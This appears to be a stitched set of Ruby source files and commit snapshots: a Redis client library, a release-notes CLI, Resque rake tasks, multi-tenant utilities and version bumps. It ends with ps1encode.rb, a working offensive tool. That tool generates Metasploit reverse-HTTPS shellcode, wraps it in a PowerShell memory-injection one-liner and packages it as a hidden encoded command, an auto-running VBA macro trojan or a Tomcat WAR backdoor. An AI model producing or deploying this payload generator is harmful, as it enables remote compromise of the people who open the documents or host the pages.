pipeline.finish(call_pipelined(pipeline.commands))
rescue ConnectionError => e
return nil if pipeline.shutdown?
# Assume the pipeline was sent in one piece, but execution of
# SHUTDOWN caused none of the replies for commands that were executed
# prior to it from coming back around.
raise e
end
end
end
def call_pipelined(commands)
return [] if commands.empty?
# The method #ensure_connected (called from #process) reconnects once on
# I/O errors. To make an effort in making sure that commands are not
# executed more than once, only allow reconnection before the first reply
# has been read. When an error occurs after the first reply has been
# read, retrying would re-execute the entire pipeline, thus re-issuing
# already successfully executed commands. To circumvent this, don't retry
# after the first reply has been read successfully.
result = Array.new(commands.size)
reconnect = @reconnect
begin
process(commands) do
result[0] = read
@reconnect = false
(commands.size - 1).times do |i|
result[i + 1] = read
end
end
ensure
@reconnect = reconnect
end
result
end
def call_without_timeout(command, &blk)
without_socket_timeout do
call(command, &blk)
end
rescue ConnectionError
retry
end
def process(commands)
logging(commands) do
ensure_connected do
commands.each do |command|
if command_map[command.first]
command = command.dup
command[0] = command_map[command.first]
end
write(command)
end
yield if block_given?
end
end
end
def connected?
connection && connection.connected?
end
def disconnect
connection.disconnect if connected?
end
def reconnect
disconnect
connect
end
# Run the given socket operation, translating low-level failures into
# redis-rb's exception hierarchy: timeouts become TimeoutError with a
# uniform message; connection-level errnos become ConnectionError.
def io
yield
rescue TimeoutError
raise TimeoutError, "Connection timed out"
rescue Errno::ECONNRESET, Errno::EPIPE, Errno::ECONNABORTED, Errno::EBADF, Errno::EINVAL => e
# Keep only the trailing class name (e.g. "ECONNRESET") in the message.
raise ConnectionError, "Connection lost (%s)" % [e.class.name.split("::").last]
end
def read
io do
connection.read
end
end
def write(command)
io do
connection.write(command)
end
end
def without_socket_timeout
connect unless connected?
begin
connection.timeout = 0
yield
ensure
connection.timeout = timeout if connected?
end
end
def with_reconnect(val=true)
begin
original, @reconnect = @reconnect, val
yield
ensure
@reconnect = original
end
end
def without_reconnect(&blk)
with_reconnect(false, &blk)
end
protected
def logging(commands)
return yield unless @logger && @logger.debug?
begin
commands.each do |name, *args|
@logger.debug("Redis >> #{name.to_s.upcase} #{args.map(&:to_s).join(" ")}")
end
t1 = Time.now
yield
ensure
@logger.debug("Redis >> %0.2fms" % ((Time.now - t1) * 1000)) if t1
end
end
def establish_connection
@connection = @options[:driver].connect(@options.dup)
rescue TimeoutError
raise CannotConnectError, "Timed out connecting to Redis on #{location}"
rescue Errno::ECONNREFUSED
raise CannotConnectError, "Error connecting to Redis on #{location} (ECONNREFUSED)"
end
# Yield with a live connection, reconnecting at most once on
# ConnectionError (and only when @reconnect allows it). Guards against
# using a socket inherited across fork by comparing PIDs. Any other
# exception tears the connection down and propagates.
def ensure_connected
tries = 0
begin
if connected?
if Process.pid != @pid
# A forked child shares the parent's socket; using it would
# interleave protocol state between the two processes.
raise InheritedError,
"Tried to use a connection from a child process without reconnecting. " +
"You need to reconnect to Redis after forking."
end
else
connect
end
tries += 1
yield
rescue ConnectionError
disconnect
# Retry exactly once (tries < 2) and only when reconnects are enabled.
if tries < 2 && @reconnect
retry
else
raise
end
rescue Exception
# NOTE(review): rescuing Exception is deliberate here — connection state
# is unknown after any failure, so drop the socket before re-raising.
disconnect
raise
end
end
# Normalize user-supplied options into the canonical options hash: merge
# DEFAULTS (calling any lambda defaults), fold in string keys, override
# from a redis:// or unix:// URL, and coerce value types.
#
# options - Hash of connection options (string or symbol keys).
#
# Returns the fully-resolved options Hash.
# Raises ArgumentError when a non-unix URL has no host.
def _parse_options(options)
  defaults = DEFAULTS.dup
  options = options.dup

  defaults.keys.each do |key|
    # Fill in defaults if needed
    if defaults[key].respond_to?(:call)
      defaults[key] = defaults[key].call
    end

    # Symbolize only keys that are needed
    options[key] = options[key.to_s] if options.has_key?(key.to_s)
  end

  url = options[:url] || defaults[:url]

  # Override defaults from URL if given
  if url
    require "uri"
    uri = URI(url)

    if uri.scheme == "unix"
      defaults[:path] = uri.path
    else
      # Require the URL to have at least a host
      raise ArgumentError, "invalid url" unless uri.host

      defaults[:scheme] = uri.scheme
      defaults[:host] = uri.host
      defaults[:port] = uri.port if uri.port
      # The password arrives percent-encoded inside the URL; decode it so
      # special characters (e.g. '@', '/', '%') reach AUTH verbatim.
      defaults[:password] = CGI.unescape(uri.password) if uri.password
      defaults[:db] = uri.path[1..-1].to_i if uri.path
    end
  end

  # Use default when option is not specified or nil
  defaults.keys.each do |key|
    options[key] ||= defaults[key]
  end

  # A unix socket path wins over host/port.
  if options[:path]
    options[:scheme] = "unix"
    options.delete(:host)
    options.delete(:port)
  else
    options[:host] = options[:host].to_s
    options[:port] = options[:port].to_i
  end

  options[:timeout] = options[:timeout].to_f
  options[:db] = options[:db].to_i
  options[:driver] = _parse_driver(options[:driver]) || Connection.drivers.last

  # Expand a numeric tcp_keepalive into {time, intvl, probes}; a Hash form
  # must already contain all three as Fixnums.
  case options[:tcp_keepalive]
  when Hash
    [:time, :intvl, :probes].each do |key|
      unless options[:tcp_keepalive][key].is_a?(Fixnum)
        raise "Expected the #{key.inspect} key in :tcp_keepalive to be a Fixnum"
      end
    end
  when Fixnum
    if options[:tcp_keepalive] >= 60
      options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 20, :intvl => 10, :probes => 2}
    elsif options[:tcp_keepalive] >= 30
      options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 10, :intvl => 5, :probes => 2}
    elsif options[:tcp_keepalive] >= 5
      options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 2, :intvl => 2, :probes => 1}
    end
  end

  options
end
def _parse_driver(driver)
driver = driver.to_s if driver.is_a?(Symbol)
if driver.kind_of?(String)
case driver
when "ruby"
require "redis/connection/ruby"
driver = Connection::Ruby
when "hiredis"
require "redis/connection/hiredis"
driver = Connection::Hiredis
when "synchrony"
require "redis/connection/synchrony"
driver = Connection::Synchrony
else
raise "Unknown driver: #{driver}"
end
end
driver
end
end
end
password could contain numerous special characters that would break your URI
require "redis/errors"
require "socket"
class Redis
class Client
DEFAULTS = {
:url => lambda { ENV["REDIS_URL"] },
:scheme => "redis",
:host => "127.0.0.1",
:port => 6379,
:path => nil,
:timeout => 5.0,
:password => nil,
:db => 0,
:driver => nil,
:id => nil,
:tcp_keepalive => 0
}
def scheme
@options[:scheme]
end
def host
@options[:host]
end
def port
@options[:port]
end
def path
@options[:path]
end
def timeout
@options[:timeout]
end
def password
@options[:password]
end
def db
@options[:db]
end
def db=(db)
@options[:db] = db.to_i
end
attr_accessor :logger
attr_reader :connection
attr_reader :command_map
def initialize(options = {})
@options = _parse_options(options)
@reconnect = true
@logger = @options[:logger]
@connection = nil
@command_map = {}
end
def connect
@pid = Process.pid
establish_connection
call [:auth, password] if password
call [:select, db] if db != 0
self
end
def id
@options[:id] || "redis://#{location}/#{db}"
end
def location
path || "#{host}:#{port}"
end
def call(command, &block)
reply = process([command]) { read }
raise reply if reply.is_a?(CommandError)
if block
block.call(reply)
else
reply
end
end
def call_loop(command)
error = nil
result = without_socket_timeout do
process([command]) do
loop do
reply = read
if reply.is_a?(CommandError)
error = reply
break
else
yield reply
end
end
end
end
# Raise error when previous block broke out of the loop.
raise error if error
# Result is set to the value that the provided block used to break.
result
end
def call_pipeline(pipeline)
with_reconnect pipeline.with_reconnect? do
begin
pipeline.finish(call_pipelined(pipeline.commands))
rescue ConnectionError => e
return nil if pipeline.shutdown?
# Assume the pipeline was sent in one piece, but execution of
# SHUTDOWN caused none of the replies for commands that were executed
# prior to it from coming back around.
raise e
end
end
end
def call_pipelined(commands)
return [] if commands.empty?
# The method #ensure_connected (called from #process) reconnects once on
# I/O errors. To make an effort in making sure that commands are not
# executed more than once, only allow reconnection before the first reply
# has been read. When an error occurs after the first reply has been
# read, retrying would re-execute the entire pipeline, thus re-issuing
# already successfully executed commands. To circumvent this, don't retry
# after the first reply has been read successfully.
result = Array.new(commands.size)
reconnect = @reconnect
begin
process(commands) do
result[0] = read
@reconnect = false
(commands.size - 1).times do |i|
result[i + 1] = read
end
end
ensure
@reconnect = reconnect
end
result
end
def call_without_timeout(command, &blk)
without_socket_timeout do
call(command, &blk)
end
rescue ConnectionError
retry
end
def process(commands)
logging(commands) do
ensure_connected do
commands.each do |command|
if command_map[command.first]
command = command.dup
command[0] = command_map[command.first]
end
write(command)
end
yield if block_given?
end
end
end
def connected?
connection && connection.connected?
end
def disconnect
connection.disconnect if connected?
end
def reconnect
disconnect
connect
end
def io
yield
rescue TimeoutError
raise TimeoutError, "Connection timed out"
rescue Errno::ECONNRESET, Errno::EPIPE, Errno::ECONNABORTED, Errno::EBADF, Errno::EINVAL => e
raise ConnectionError, "Connection lost (%s)" % [e.class.name.split("::").last]
end
def read
io do
connection.read
end
end
def write(command)
io do
connection.write(command)
end
end
def without_socket_timeout
connect unless connected?
begin
connection.timeout = 0
yield
ensure
connection.timeout = timeout if connected?
end
end
def with_reconnect(val=true)
begin
original, @reconnect = @reconnect, val
yield
ensure
@reconnect = original
end
end
def without_reconnect(&blk)
with_reconnect(false, &blk)
end
protected
def logging(commands)
return yield unless @logger && @logger.debug?
begin
commands.each do |name, *args|
@logger.debug("Redis >> #{name.to_s.upcase} #{args.map(&:to_s).join(" ")}")
end
t1 = Time.now
yield
ensure
@logger.debug("Redis >> %0.2fms" % ((Time.now - t1) * 1000)) if t1
end
end
def establish_connection
@connection = @options[:driver].connect(@options.dup)
rescue TimeoutError
raise CannotConnectError, "Timed out connecting to Redis on #{location}"
rescue Errno::ECONNREFUSED
raise CannotConnectError, "Error connecting to Redis on #{location} (ECONNREFUSED)"
end
def ensure_connected
tries = 0
begin
if connected?
if Process.pid != @pid
raise InheritedError,
"Tried to use a connection from a child process without reconnecting. " +
"You need to reconnect to Redis after forking."
end
else
connect
end
tries += 1
yield
rescue ConnectionError
disconnect
if tries < 2 && @reconnect
retry
else
raise
end
rescue Exception
disconnect
raise
end
end
def _parse_options(options)
defaults = DEFAULTS.dup
options = options.dup
defaults.keys.each do |key|
# Fill in defaults if needed
if defaults[key].respond_to?(:call)
defaults[key] = defaults[key].call
end
# Symbolize only keys that are needed
options[key] = options[key.to_s] if options.has_key?(key.to_s)
end
url = options[:url] || defaults[:url]
# Override defaults from URL if given
if url
require "uri"
uri = URI(url)
if uri.scheme == "unix"
defaults[:path] = uri.path
else
# Require the URL to have at least a host
raise ArgumentError, "invalid url" unless uri.host
defaults[:scheme] = uri.scheme
defaults[:host] = uri.host
defaults[:port] = uri.port if uri.port
defaults[:password] = CGI::unescape(uri.password) if uri.password
defaults[:db] = uri.path[1..-1].to_i if uri.path
end
end
# Use default when option is not specified or nil
defaults.keys.each do |key|
options[key] ||= defaults[key]
end
if options[:path]
options[:scheme] = "unix"
options.delete(:host)
options.delete(:port)
else
options[:host] = options[:host].to_s
options[:port] = options[:port].to_i
end
options[:timeout] = options[:timeout].to_f
options[:db] = options[:db].to_i
options[:driver] = _parse_driver(options[:driver]) || Connection.drivers.last
case options[:tcp_keepalive]
when Hash
[:time, :intvl, :probes].each do |key|
unless options[:tcp_keepalive][key].is_a?(Fixnum)
raise "Expected the #{key.inspect} key in :tcp_keepalive to be a Fixnum"
end
end
when Fixnum
if options[:tcp_keepalive] >= 60
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 20, :intvl => 10, :probes => 2}
elsif options[:tcp_keepalive] >= 30
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 10, :intvl => 5, :probes => 2}
elsif options[:tcp_keepalive] >= 5
options[:tcp_keepalive] = {:time => options[:tcp_keepalive] - 2, :intvl => 2, :probes => 1}
end
end
options
end
def _parse_driver(driver)
driver = driver.to_s if driver.is_a?(Symbol)
if driver.kind_of?(String)
case driver
when "ruby"
require "redis/connection/ruby"
driver = Connection::Ruby
when "hiredis"
require "redis/connection/hiredis"
driver = Connection::Hiredis
when "synchrony"
require "redis/connection/synchrony"
driver = Connection::Synchrony
else
raise "Unknown driver: #{driver}"
end
end
driver
end
end
end
|
require 'trollop'
require 'releasenoter/version'
require "git"
module Releasenoter
# Issue-reference patterns, exposed as a frozen constant so they are
# actually reachable — a plain local in the module body is invisible to
# the classes below and was effectively dead code.
PATTERNS = {
  jira: /(\w{2,4}-\d+)/, # e.g. AB-123 (2-4 word chars, dash, digits)
  github: /\#(\d+)/      # e.g. #33
}.freeze
# Command-line front end: parses options with Trollop and memoizes them at
# class level for other components (see FromGit) to read.
class Cli
def self.start_cli
@opts = Trollop::options do
version "Releasenoter " + Releasenoter::VERSION
opt :since, "Starting point", :type => :string
opt :to, "Ending at", :type => :string
opt :github, "Highlight Github issue commits", :default => true
opt :jira, "Highlight JIRA issue commits", :default => true
opt :merges, "Include merge commits", :default => false
opt :untagged, "Skip commits without issue references", :default => true
end
end
# Parsed options hash; valid only after start_cli has run.
def self.get_opts
return @opts
end
end
# Reads the git log of the current working directory and prints release
# notes, honouring the CLI options (range selection, merge inclusion).
class FromGit
def self.get_log
cli_opts = Releasenoter::Cli.get_opts
if cli_opts[:github]
puts "Will highlight Github issue commits."
end
if cli_opts[:jira]
puts "Will highlight JIRA issue commits."
end
if cli_opts[:merges]
puts "Will include merge commits."
end
@git = Git.open('.')
# Select the commit range: --since alone, --since..--to, or everything.
if cli_opts[:since] && !cli_opts[:to]
gitlog = @git.log.since(cli_opts[:since])
elsif cli_opts[:since] && cli_opts[:to]
gitlog = @git.log.between(cli_opts[:since], cli_opts[:to])
else
gitlog = @git.log
end
gitlog.each do |commit|
author_name = commit.author.name
author_email = commit.author.email
commit_message = commit.message
sha = commit.sha
# Merge commits print only when --merges was given.
# NOTE(review): /Merge/ also matches messages that merely contain the
# word "Merge" anywhere — confirm this heuristic is acceptable.
if commit_message !~ /Merge/
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
else
if cli_opts[:merges]
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
end
end
end
end
end
end
Fixing some regex. Also, a fake github issue reference for debugging purposes: #33.
require 'trollop'
require 'releasenoter/version'
require "git"
module Releasenoter
class Cli
def self.start_cli
@opts = Trollop::options do
version "Releasenoter " + Releasenoter::VERSION
opt :since, "Starting point", :type => :string
opt :to, "Ending at", :type => :string
opt :github, "Highlight Github issue commits", :default => true
opt :jira, "Highlight JIRA issue commits", :default => true
opt :merges, "Include merge commits", :default => false
opt :untagged, "Skip commits without issue references", :default => true
end
end
def self.get_opts
return @opts
end
end
class FromGit
def self.get_log
jira_pat = /(\w{2,4}-\d+)/
github_pat = /\#(\d+)/
cli_opts = Releasenoter::Cli.get_opts
if cli_opts[:github]
puts "Will highlight Github issue commits."
end
if cli_opts[:jira]
puts "Will highlight JIRA issue commits."
end
if cli_opts[:merges]
puts "Will include merge commits."
end
@git = Git.open('.')
if cli_opts[:since] && !cli_opts[:to]
gitlog = @git.log.since(cli_opts[:since])
elsif cli_opts[:since] && cli_opts[:to]
gitlog = @git.log.between(cli_opts[:since], cli_opts[:to])
else
gitlog = @git.log
end
gitlog.each do |commit|
author_name = commit.author.name
author_email = commit.author.email
commit_message = commit.message
if commit_message =~ jira_pat
puts commit_message.sub(jira_pat, 'JIRA: \1')
end
if commit_message =~ github_pat
puts commit_message.sub(github_pat, 'GH: \1')
end
sha = commit.sha
if commit_message !~ /Merge/
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
else
if cli_opts[:merges]
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
end
end
end
end
end
end
|
module Relp
# Gem version string.
VERSION = "0.0.1"
end
first release version
module Relp
VERSION = "0.1"
end
|
# require 'resque/tasks'
# will give you the resque tasks
namespace :resque do
# Hook for applications to attach environment loading (e.g. Rails) by
# enhancing this task; intentionally empty here.
task :setup
desc "Start a Resque worker"
task :work => :setup do
require 'resque'
# Queues come from QUEUES or QUEUE (comma-separated).
queues = (ENV['QUEUES'] || ENV['QUEUE']).to_s.split(',')
begin
worker = Resque::Worker.new(*queues)
# LOGGING/VERBOSE enable normal logging; VVERBOSE enables debug logging.
worker.verbose = ENV['LOGGING'] || ENV['VERBOSE']
worker.very_verbose = ENV['VVERBOSE']
rescue Resque::NoQueueError
abort "set QUEUE env var, e.g. $ QUEUE=critical,high rake resque:work"
end
# Optionally record the worker PID for process supervisors.
if ENV['PIDFILE']
File.open(ENV['PIDFILE'], 'w') { |f| f << worker.pid }
end
worker.log "Starting worker #{worker}"
worker.work(ENV['INTERVAL'] || 5) # interval, will block
end
desc "Start multiple Resque workers. Should only be used in dev mode."
task :workers do
threads = []
# Spawn COUNT workers, each running rake resque:work in its own process;
# the threads merely supervise the shelled-out processes.
ENV['COUNT'].to_i.times do
threads << Thread.new do
system "rake resque:work"
end
end
threads.each { |thread| thread.join }
end
end
Attempt to preload files under app/ when using Rails
# require 'resque/tasks'
# will give you the resque tasks
namespace :resque do
task :setup
desc "Start a Resque worker"
task :work => :setup do
require 'resque'
queues = (ENV['QUEUES'] || ENV['QUEUE']).to_s.split(',')
begin
worker = Resque::Worker.new(*queues)
worker.verbose = ENV['LOGGING'] || ENV['VERBOSE']
worker.very_verbose = ENV['VVERBOSE']
rescue Resque::NoQueueError
abort "set QUEUE env var, e.g. $ QUEUE=critical,high rake resque:work"
end
if ENV['PIDFILE']
File.open(ENV['PIDFILE'], 'w') { |f| f << worker.pid }
end
worker.log "Starting worker #{worker}"
worker.work(ENV['INTERVAL'] || 5) # interval, will block
end
desc "Start multiple Resque workers. Should only be used in dev mode."
task :workers do
threads = []
ENV['COUNT'].to_i.times do
threads << Thread.new do
system "rake resque:work"
end
end
threads.each { |thread| thread.join }
end
end
# Preload app files
task :environment do
Dir['app/**/*.rb'].each do |file|
require file
end
end
|
module Rgot
VERSION = "0.0.4"
end
v0.0.5
module Rgot
VERSION = "0.0.5"
end
|
module Rmre
VERSION = "0.0.4" unless defined?(::Rmre::VERSION)
end
Version bump
module Rmre
VERSION = "0.0.5" unless defined?(::Rmre::VERSION)
end
|
module Roomer
module Utils
# Rails DB Migrations Directory
# @return [String] full path to the current migrations directory
def migrations_directory
ActiveRecord::Migrator.migrations_path
end
# Directory where the models are stored
# @return [String] path of the directory where the models are stored
def model_directory
File.join("app","models")
end
# Constructs the full name for the tenants table with schema
# Example: 'global.tenant'
# @return [String] full name of the tenant table
def full_tenants_table_name
"#{shared_schema_name}#{schema_seperator}#{tenants_table}"
end
# Constructs the full path to the shared schema directory
# Example: /Users/Greg/Projects/roomer/db/migrate/global
# @return [String] full path to the shared schema directory
def full_shared_schema_migration_path
"#{Rails.root}/#{shared_migrations_directory}"
end
# Returns tenant model as a constant
# Example: Tenant
# @return Object
def tenant_model
Roomer.tenants_table.to_s.classify.constantize
end
# Sets current tenant from ApplicationController into a Thread
# local variable. Works only with thread-safe Rails as long as
# it gets set on every request
# @return [Symbol] the current tenant key in the thread
def current_tenant=(val)
key = :"roomer_current_tenant"
Thread.current[key] = val
ensure_tenant_model_reset
end
# Fetches the current tenant
# @return [Symbol] the current tenant key in the thread
def current_tenant
key = :"roomer_current_tenant"
Thread.current[key]
end
# Reset current tenant
# @return [Nil]
def reset_current_tenant
key = :"roomer_current_tenant"
Thread.current[key] = nil
end
# Reset cached data in tenanted models
def ensure_tenant_model_reset
ActiveRecord::Base.descendants.each do |model|
model.roomer_reset if model.tenanted?
end
reload_models
end
protected
def reload_models
Dir["#{Rails.root.to_s}/app/models/**/*.*"].each do |path|
begin
Rails.load "#{path}"
rescue
end
end
end
def clean_environment
ActionDispatch::Reloader.cleanup!
end
end
end
only setting tenant if different
module Roomer
# Mixin of path, naming, and current-tenant helpers shared across Roomer.
module Utils
# Rails DB Migrations Directory
# @return [String] full path to the current migrations directory
def migrations_directory
ActiveRecord::Migrator.migrations_path
end
# Directory where the models are stored
# @return [String] path of the directory where the models are stored
def model_directory
File.join("app","models")
end
# Constructs the full name for the tenants table with schema
# Example: 'global.tenant'
# @return [String] full name of the tenant table
def full_tenants_table_name
"#{shared_schema_name}#{schema_seperator}#{tenants_table}"
end
# Constructs the full path to the shared schema directory
# Example: /Users/Greg/Projects/roomer/db/migrate/global
# @return [String] full path to the shared schema directory
def full_shared_schema_migration_path
"#{Rails.root}/#{shared_migrations_directory}"
end
# Returns tenant model as a constant
# Example: Tenant
# @return Object
def tenant_model
Roomer.tenants_table.to_s.classify.constantize
end
# Sets current tenant from ApplicationController into a Thread
# local variable. Works only with thread-safe Rails as long as
# it gets set on every request.
# Skips the expensive model reset/reload when the tenant assigned is
# already the current one (compared by name).
# @return [Symbol] the current tenant key in the thread
def current_tenant=(val)
key = :"roomer_current_tenant"
unless Thread.current[key].try(:name) == val.name
Thread.current[key] = val
ensure_tenant_model_reset
end
end
# Fetches the current tenant
# @return [Symbol] the current tenant key in the thread
def current_tenant
key = :"roomer_current_tenant"
Thread.current[key]
end
# Reset current tenant
# @return [Nil]
def reset_current_tenant
key = :"roomer_current_tenant"
Thread.current[key] = nil
end
# Reset cached data in tenanted models, then reload model files.
def ensure_tenant_model_reset
ActiveRecord::Base.descendants.each do |model|
model.roomer_reset if model.tenanted?
end
reload_models
end
protected
# Best-effort reload of every model file; load errors are deliberately
# swallowed so a broken model does not abort tenant switching.
# NOTE(review): Rails.load is not a public Rails API — Kernel#load was
# probably intended; any NoMethodError here is silently rescued. Confirm.
def reload_models
Dir["#{Rails.root.to_s}/app/models/**/*.*"].each do |path|
begin
Rails.load "#{path}"
rescue
end
end
end
# Trigger Rails' reloader cleanup between tenant switches.
def clean_environment
ActionDispatch::Reloader.cleanup!
end
end
end
|
#!/usr/bin/ruby
#
# ps1encode.rb
#
# by Piotr Marszalik - peter.mars[at]outlook.com
# 05/08/2013
#
#
# Use to generate and encode a powershell based metasploit payloads.
#
#
# Available output types:
# => raw (encoded payload only - no powershell run options)
# => cmd (for use with bat files)
# => vba (for use with macro trojan docs) < developed in conjunction with Ryan Reynolds
# => war (tomcat) < developed in conjuntion with Tony James
# => exe (executable) requires MinGW - i586-mingw32msvc-gcc [apt-get install mingw32]
# => java (for use with malicious java applets)
# => php (for use with php pages)
# => hta (HTML applications)
# => cfm (for use with Adobe ColdFusion)
#
# Powershell code based on PowerSploit written by Matthew Graeber and SET by Dave Kennedy
# DETAILS - http://rvnsec.wordpress.com/2014/09/01/ps1encode-powershell-for-days/
#
require 'optparse'
require 'base64'
# CLI option parsing: collects LHOST/LPORT/PAYLOAD/ENCODE, defaulting to a
# local HTTPS meterpreter handler with cmd-style output.
options = {}
optparse = OptionParser.new do|opts|
opts.banner = "Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd]"
opts.separator ""
options[:LHOST] = "127.0.0.1"
options[:LPORT] = "443"
options[:PAYLOAD] = "windows/meterpreter/reverse_https"
options[:ENCODE] = "cmd"
opts.on('-i', '--LHOST VALUE', "Local host IP address") do |i|
options[:LHOST] = i
end
opts.on('-p', '--LPORT VALUE', "Local host port number") do |p|
options[:LPORT] = p
end
opts.on('-a', '--PAYLOAD VALUE', "Payload to use") do |a|
options[:PAYLOAD] = a
end
opts.on('-t', '--ENCODE VALUE', "Output format: raw, cmd, vba, war, exe, java, php, hta, cfm") do |t|
options[:ENCODE] = t
end
opts.separator ""
end
# Print usage and quit when invoked with no arguments at all.
if ARGV.empty?
puts optparse
exit
else
optparse.parse!
end
# Globals consumed by gen_PS_shellcode and the encoder sections below.
$lhost = options[:LHOST]
$lport = options[:LPORT]
$lpayload = options[:PAYLOAD]
$lencode = options[:ENCODE]
#string byte to hex
class String
def to_hex
#"0x" + self.to_i.to_s(16)
sprintf("0x%02x", self.to_i)
end
end
# Generate raw shellcode with msfvenom, convert it to a PowerShell byte
# array literal, embed it in an in-memory injection one-liner, and return
# the result base64-encoded as UTF-16LE (the form `powershell -enc` expects).
#
# Reads the $lpayload/$lhost/$lport globals parsed from the CLI.
# Side effects: shells out to msfvenom and creates/removes the temp file
# "raw_shellcode_temp" in the current directory.
def gen_PS_shellcode()
results = []
resultsS = ""
#generate the shellcode via msfvenom and write to a temp txt file
system("msfvenom -p #{$lpayload} LHOST=#{$lhost} LPORT=#{$lport} -s 341 -f raw > raw_shellcode_temp")
#taking raw shellcode, each byte goes into array
File.open('raw_shellcode_temp').each_byte do |b|
results << b
end
#remove temp
system("rm raw_shellcode_temp")
#go through the array, convert each byte in the array to a hex string
results.each do |i|
resultsS = resultsS + i.to_s.to_hex + ","
end
#remove last unnecessary comma
resultsS = resultsS.chop
#powershell script to be executed pre-encode: VirtualAlloc + memset +
#CreateThread injection, re-invoking 32-bit powershell on 64-bit hosts
finstring = "$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{resultsS};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";$cmd = \"-nop -noni -enc \";iex \"& $x86 $cmd $gq\"}else{$cmd = \"-nop -noni -enc\";iex \"& powershell $cmd $gq\";}"
#convert to UTF-16 (powershell interprets base64 of UTF-16)
ec = Encoding::Converter.new("UTF-8", "UTF-16LE")
utfEncoded = ec.convert(finstring)
#string to base64 - final
finPS = Base64.encode64(utfEncoded).gsub(/\n/, '')
return finPS
end
# Split an encoded PowerShell payload into VBA-safe 254-character string
# assignments plus a final statement that concatenates them back together.
#
# (Cleanup: removed the dead `splitup = []` initialization and the no-op
# `.flatten` — String#scan with a groupless pattern already returns a flat
# array of strings.)
#
# @param ps_shellcode [String] base64-encoded PowerShell one-liner
# @return [String] VBA source: one `stringN="..."` assignment per chunk,
#   a blank line, then `stringFinal=stringA+string0+string1+...`
#   (stringA — the powershell.exe prefix — is defined by the VBA template)
def prep_PS_chunk(ps_shellcode)
  # VBA string literals have length limits, so emit <=254-char chunks.
  chunks = ps_shellcode.scan(/.{1,254}/)
  assignments = ""
  chunk_names = []
  chunks.each_with_index do |chunk, index|
    # Strip embedded double quotes so each VBA literal stays well-formed.
    safe_chunk = chunk.tr('"', '')
    assignments << "string#{index}=\"#{safe_chunk}\"\n"
    chunk_names << "string#{index}"
  end
  final_statement = (["stringFinal=stringA"] + chunk_names).join("+")
  assignments + "\n" + final_statement
end
###########################RAW_ENCODE###########################
# Print the bare encoded payload with no powershell invocation wrapper.
puts gen_PS_shellcode() if $lencode == "raw"
##########################CMD_ENCODE###########################
if $lencode == "cmd"
  # Wrap the payload in a ready-to-paste powershell command line.
  puts "powershell -nop -win Hidden -noni -enc #{gen_PS_shellcode()}"
end
########################VBS_ENCODE###############################
# Emit a VBA macro (Auto_Open / AutoOpen / Workbook_Open entry points) that
# shells out to powershell; the payload is split into VBA-safe string chunks
# by prep_PS_chunk because VBA limits string literal length.
if $lencode == "vba"
powershell_encoded = gen_PS_shellcode()
prepped_powershell_encoded = prep_PS_chunk(powershell_encoded)
#final VBA template
vbaTEMPLATE = %{Sub Auto_Open()
stringA = "powershell.exe -NoE -NoP -NonI -W Hidden -E "
#{prepped_powershell_encoded}
Shell stringFinal, 0
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
}
puts vbaTEMPLATE
end
########################WAR_ENCODE###############################
# Build a deployable Tomcat WAR: a JSP that executes the encoded payload
# plus a minimal web.xml, packaged into sample.war via the `jar` tool.
# Side effects: creates/removes ./wartemp, writes ./sample.war.
if $lencode == "war"
powershell_encoded = gen_PS_shellcode()
warTEMPLATE = %{<%@ page import="java.io.*" %>
<html>
<head>
<title>Sample</title>
</head>
<body>
<%
String yourCommand[]=\{"cmd.exe" ,"/C", " powershell -nop -win Hidden -noni -enc #{powershell_encoded} "\};
try \{
Process p = Runtime.getRuntime().exec(yourCommand);
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
\} catch (IOException ioe) \{
System.err.println("\\n\\n\\nIOException: "+ ioe.toString());
\}
%>
</body>
</html>
}
#web.xml - saved within WEB-INF directory
webxmlTEMPLATE = %{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>Sample</servlet-name>
<jsp-file>/sample.jsp</jsp-file>
</servlet>
</web-app>
}
#temp dir - write in jsp file
system("mkdir wartemp")
jsp_file_temp = File.new("wartemp/sample.jsp", "w")
jsp_file_temp.write(warTEMPLATE)
jsp_file_temp.close
#new WEB-INF directory, write in web.xml
system("mkdir wartemp/WEB-INF")
webxml_file_temp = File.new("wartemp/WEB-INF/web.xml", "w")
webxml_file_temp.write(webxmlTEMPLATE)
webxml_file_temp.close
#Create JAR file
system("jar -cvf sample.war -C wartemp/ .")
#clean up
system("rm -r wartemp")
end
########################EXE_ENCODE###############################
